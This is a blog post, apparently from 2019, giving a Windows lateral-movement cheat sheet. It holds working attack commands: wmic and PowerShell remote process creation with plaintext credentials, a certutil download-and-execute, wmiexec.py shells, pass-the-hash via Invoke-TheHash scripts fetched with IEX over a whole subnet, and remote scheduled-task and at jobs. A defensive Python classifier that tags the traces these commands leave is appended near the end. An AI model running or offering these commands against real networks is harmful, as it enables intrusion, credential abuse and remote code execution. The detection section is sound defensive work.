Internal Network Penetration - Lateral Movement

SMB WMI

Query process information on a remote host with wmic:

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief


Create a process:

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process call create "calc.exe"


Download a file and execute it:

wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process call create "cmd /c certutil.exe -urlcache -split -f http://10.60.18.18/test/putty.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"


View host process information with PowerShell:

powershell -ep bypass
Get-WmiObject -Namespace "root\cimv2" -class Win32_process -Credential administrator -ComputerName 192.168.91.131


View share information:

Get-WmiObject -Namespace "root\cimv2" -class Win32_share -Credential administrator -ComputerName 192.168.91.131


Open an interactive shell:

python setup.py install
python wmiexec.py -share admin$ administrator:360College@192.168.111.51


Use the hash against other machines in the internal network:

powershell -ep bypass
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');
Invoke-TheHash -Type WMIExec -Target 192.168.111.0/24 -Domain rootkit -Username administrator -Hash 7c70a81c7c5882c24298d391fd397885


Scheduled tasks

ipc

net use \\192.168.91.131\IPC$ /user:"administrator" "ABCabc123"
copy C:\Users\qianxiao996\Desktop\putty.exe \\192.168.91.131\c$

schtasks

schtasks /create /s 192.168.91.131 /u Administrator /p ABCabc123 /ru "SYSTEM" /tn CMDNAME /sc DAILY /st 22:18 /tr C:\\Users\\qianxiao996\\Desktop\\sha\\cmd.bat /F

at

at \\192.168.91.131 19:30 /every:5,6,7,10,18,19,21,24,28 c:\windows\temp\cmd.bat
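A defender-side counterpart to the techniques on this page, added here as an example and not part of the original post: a small Python classifier that runs over constructed process-creation records (fields modelled on Windows Security event 4688 / Sysmon event 1) and tags the artefacts the commands above leave behind: processes whose parent is WmiPrvSE.exe (what `wmic process call create`, wmiexec.py and Invoke-WMIExec produce on the target), certutil -urlcache downloads, and remote schtasks /create or at \\host jobs. The sample records, host names and tag names are all constructed.

```python
import ntpath
import re

# Constructed process-creation records with the fields of Windows Security
# event 4688 / Sysmon event 1; these are not real captured logs.
SAMPLE_EVENTS = [
    {"host": "WS-131", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\calc.exe", "cmdline": "calc.exe"},
    {"host": "WS-131", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c certutil.exe -urlcache -split -f http://10.60.18.18/test/putty.exe "
                "c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"},
    {"host": "WS-SOURCE", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /create /s 192.168.91.131 /u Administrator /p *** /ru SYSTEM "
                "/tn CMDNAME /sc DAILY /st 22:18 /tr C:\\Users\\qianxiao996\\Desktop\\sha\\cmd.bat /F"},
    {"host": "WS-131", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

def _base(path: str) -> str:
    return ntpath.basename(path).lower()

def classify(event: dict) -> list:
    """Return the detection tags that fire for one process-creation record."""
    tags = []
    cmd = event["cmdline"].lower()
    # A child of the WMI provider host is what `wmic process call create`,
    # wmiexec.py and Invoke-WMIExec look like on the target machine.
    if _base(event["parent"]) == "wmiprvse.exe":
        tags.append("wmi_spawned_process")
    # wmic.exe with /node: is the source-host side of the same activity.
    if _base(event["image"]) == "wmic.exe" and "/node:" in cmd:
        tags.append("wmic_remote_target")
    # certutil -urlcache -f <url> is the download-and-execute trick.
    if "certutil" in cmd and "-urlcache" in cmd:
        tags.append("certutil_download")
    # schtasks /create /s <host> and at \\<host> register jobs on another machine;
    # "/s" followed by whitespace does not match the /sc and /st switches.
    if _base(event["image"]) == "schtasks.exe" and "/create" in cmd and re.search(r"/s\s+\S+", cmd):
        tags.append("remote_schtask_create")
    if _base(event["image"]) == "at.exe" and re.match(r"at\s+\\\\", cmd):
        tags.append("remote_at_job")
    return tags

def scan(events: list) -> list:
    """Return (host, image, tags) for every record that fires at least one tag."""
    return [(e["host"], _base(e["image"]), classify(e)) for e in events if classify(e)]
```

In a real deployment the records would come from the SIEM's 4688/Sysmon feed, and the WmiPrvSE.exe parent rule in particular is worth an alert on any host that is not expected to receive remote WMI calls.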
Posted 2019-05-31 20:04 by 浅笑996